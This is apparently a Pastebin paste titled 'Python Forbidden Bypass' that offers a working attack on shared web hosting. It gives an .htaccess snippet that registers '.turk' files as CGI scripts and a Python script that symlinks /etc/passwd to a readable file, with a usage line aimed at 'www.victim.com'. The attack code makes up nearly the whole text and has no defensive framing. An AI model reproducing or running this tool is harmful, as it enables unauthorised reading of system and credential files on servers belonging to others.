lehieuit

Python Forbidden Bypass

May 6th, 2012
245
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.40 KB | None | 0 0
  1. .htacesss
  2. Kod:
  3.  
  4. Options FollowSymLinks MultiViews Indexes ExecCGI
  5.  
  6. AddType application/x-httpd-cgi .turk
  7.  
  8. AddHandler cgi-script .turk
  9. AddHandler cgi-script .turk
  10.  
  11. pyton tool
  12.  
  13. izo.turk
  14.  
  15. Kod:
  16.  
  17. #!/usr/bin/python
  18. print "Content-type: text/html\n\n"
  19.  
  20. import os
  21. filename = "turk.txt"   #dst
  22. linkto = "/etc/passwd"   #source
  23. os.symlink(linkto, filename)
  24.  
  25. kullanım:www.victim.com/izo.turk
Advertisement
Add Comment
Please, Sign In to add comment